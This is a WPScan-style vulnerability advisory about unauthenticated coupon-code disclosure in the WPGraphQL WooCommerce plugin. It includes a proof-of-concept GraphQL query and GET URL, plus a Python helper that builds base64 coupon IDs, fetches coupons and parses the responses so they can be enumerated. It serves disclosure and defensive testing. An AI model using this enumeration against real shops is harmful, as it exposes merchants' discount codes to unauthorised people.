Database: wpvulndb
Author: Rohan Pagey
WPVDB-ID: 19138092-50D3-4D63-97C5-AA8E1CE39456
Date: Jul 26, 2022 - 12:00 a.m.

WPGraphQL WooCommerce <= 0.11.0 - Unauthenticated Coupon Codes Disclosure

Source: wpscan.com

The plugin does not prevent unauthenticated attackers from enumerating a shop’s coupon codes and values via GraphQL.

PoC

The vulnerability exists because the plugin restricts only the "coupons" aggregate (connection) field to privileged users and leaves the singular "coupon" field unrestricted. Given a valid coupon ID, any unauthenticated user can issue the following GraphQL query and receive the coupon code and discount amount associated with it. Coupon IDs are WPGraphQL global IDs of the form base64("shop_coupon:x"), where x is the coupon's WordPress post ID, usually a two- or three-digit integer, so the whole ID space is trivial to enumerate.

    query {
      coupon(id: "c2hvcF9jb3Vwb246MTk=") {
        amount
        code
      }
    }

Sent as a GET request, the final URL looks like this (c2hvcF9jb3Vwb246MTIz decodes to shop_coupon:123; most HTTP clients will percent-encode the braces and quotes for you):

    http://vulnerable-site.tld/graphql?query=query{coupon(id:"c2hvcF9jb3Vwb246MTIz"){amount code}}
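The following Python helper, added here as an illustration and not part of the original advisory or of the plugin, works through the ID scheme described above: it encodes and decodes the base64("shop_coupon:x") global IDs, builds the singular "coupon" query and its GET form with proper percent-encoding, and parses the JSON a WPGraphQL endpoint returns. The host vulnerable-site.tld is the placeholder from the advisory; the two sample response bodies are constructed, not captured from a real site. Nothing touches the network unless fetch_coupon() is called explicitly, and that must only be done against a site you are authorised to test.

```python
"""Helper for the WPGraphQL WooCommerce unauthenticated coupon-disclosure PoC.

WPGraphQL global IDs are base64("<type>:<id>"); for coupons the type is the
WooCommerce post type "shop_coupon" and <id> is the coupon's WordPress post ID.
"""
import base64
import json
import urllib.parse
import urllib.request
from typing import Optional

COUPON_TYPE = "shop_coupon"


def coupon_global_id(post_id: int) -> str:
    """Encode a coupon post ID as a WPGraphQL global ID (19 -> c2hvcF9jb3Vwb246MTk=)."""
    return base64.b64encode(f"{COUPON_TYPE}:{post_id}".encode()).decode()


def decode_global_id(global_id: str) -> tuple[str, int]:
    """Inverse of coupon_global_id(); raises ValueError if the input is not a <type>:<int> ID."""
    raw = base64.b64decode(global_id, validate=True).decode()
    type_name, _, num = raw.partition(":")
    if not type_name or not num.isdigit():
        raise ValueError(f"not a WPGraphQL global ID: {raw!r}")
    return type_name, int(num)


def coupon_query(global_id: str) -> str:
    """The singular 'coupon' query from the advisory (the unrestricted field)."""
    return f'query{{coupon(id:"{global_id}"){{amount code}}}}'


def coupon_url(base: str, post_id: int) -> str:
    """GET form of the PoC; urlencode() percent-encodes the braces and quotes."""
    params = urllib.parse.urlencode({"query": coupon_query(coupon_global_id(post_id))})
    return f"{base.rstrip('/')}/graphql?{params}"


def extract_coupon(body: str) -> Optional[dict]:
    """Return {code, amount} from a GraphQL response body, or None if the ID did not resolve.

    A non-existent ID yields "coupon": null; a GraphQL error yields no "data" at all.
    Both cases map to None so an enumeration loop can simply skip them.
    """
    data = json.loads(body)
    coupon = (data.get("data") or {}).get("coupon")
    if not coupon or not coupon.get("code"):
        return None
    return {"code": coupon["code"], "amount": coupon.get("amount")}


def fetch_coupon(base: str, post_id: int, timeout: float = 10.0) -> Optional[dict]:
    """Issue one unauthenticated GET for a single coupon post ID (authorised targets only)."""
    with urllib.request.urlopen(coupon_url(base, post_id), timeout=timeout) as resp:
        return extract_coupon(resp.read().decode())


# Constructed sample responses in the shape WPGraphQL returns; not from a real shop.
SAMPLE_HIT = '{"data":{"coupon":{"amount":10.0,"code":"SUMMER10"}}}'
SAMPLE_MISS = '{"data":{"coupon":null}}'

if __name__ == "__main__":
    for pid in (19, 123):
        print(pid, coupon_global_id(pid))
        print("  ", coupon_url("http://vulnerable-site.tld", pid))
    print(extract_coupon(SAMPLE_HIT), extract_coupon(SAMPLE_MISS))
```

Because a valid coupon ID is just a base64-wrapped post ID, an enumeration loop over coupon_url() for a small integer range is all an attacker needs; the same helper lets a defender confirm, before and after upgrading, that the singular field now rejects anonymous callers.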

CPE Name                Operator   Version
wp-graphql-woocommerce  eq         *